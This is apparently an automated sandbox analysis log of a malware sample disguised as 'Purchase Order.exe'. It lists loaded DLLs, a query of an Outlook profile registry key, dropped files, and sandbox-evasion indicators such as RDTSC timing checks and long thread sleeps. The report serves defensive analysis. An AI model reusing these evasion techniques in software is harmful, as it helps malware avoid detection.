            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile written: C:\ProgramData\ankomstperrons.iniJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Purchase Order.exeStatic file information: File size 1055136 > 1048576
            Source: Purchase Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2755799259.0000000005F62000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_10002D20 push eax; ret 0_2_10002D4E
            Source: C:\Users\user\Desktop\Purchase Order.exeFile created: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Purchase Order.exeAPI/Special instruction interceptor: Address: 659F591
            Source: C:\Users\user\Desktop\Purchase Order.exeAPI/Special instruction interceptor: Address: 27EF591
            Source: C:\Users\user\Desktop\Purchase Order.exeRDTSC instruction interceptor: First address: 653E3D2 second address: 653E3D2 instructions: 0x00000000 rdtsc 0x00000002 test ah, ch 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FA27052805Fh 0x00000008 cmp cx, 58E6h 0x0000000d inc ebp 0x0000000e test bh, ah 0x00000010 inc ebx 0x00000011 test bl, bl 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\Purchase Order.exeRDTSC instruction interceptor: First address: 278E3D2 second address: 278E3D2 instructions: 0x00000000 rdtsc 0x00000002 test ah, ch 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FA270755D7Fh 0x00000008 cmp cx, 58E6h 0x0000000d inc ebp 0x0000000e test bh, ah 0x00000010 inc ebx 0x00000011 test bl, bl 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\Purchase Order.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeMemory allocated: 36830000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeMemory allocated: 38830000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599657Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599421Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598813Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598703Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598594Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598469Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598235Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598125Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598016Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597891Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597766Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597657Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597532Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597407Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597297Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597188Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597063Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596938Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596813Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596688Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596578Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596469Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596344Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596110Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595985Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595860Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595735Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595610Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595485Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595365Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594985Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594860Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594735Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594610Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594485Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594360Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594235Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594110Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeWindow / User API: threadDelayed 2128Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeWindow / User API: threadDelayed 7691Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Purchase Order.exeAPI coverage: 1.5 %
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep count: 41 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -37815825351104557s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 4592Thread sleep count: 2128 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 4592Thread sleep count: 7691 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -599657s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -599532s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -599421s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -599313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -599188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -599063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -598938s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -598813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -598703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -598594s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -598469s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -598344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -598235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -598125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -598016s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -597891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -597766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -597657s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -597532s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -597407s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -597297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -597188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -597063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -596938s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -596813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -596688s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -596578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -596469s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -596344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -596235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -596110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -595985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -595860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -595735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -595610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -595485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -595365s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -595235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -595110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -594985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -594860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -594735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -594610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -594485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -594360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -594235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076Thread sleep time: -594110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_0040270B FindFirstFileA,0_2_0040270B
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_004061FB FindFirstFileA,FindClose,0_2_004061FB
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_00405799 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405799
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_0040270B FindFirstFileA,4_2_0040270B
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_004061FB FindFirstFileA,FindClose,4_2_004061FB
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_00405799 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_00405799
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599657Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599421Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598813Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598703Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598594Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598469Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598235Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598125Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598016Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597891Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597766Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597657Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597532Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597407Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597297Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597188Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597063Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596938Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596813Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596688Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596578Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596469Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596344Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596110Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595985Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595860Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595735Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595610Jump to behavior
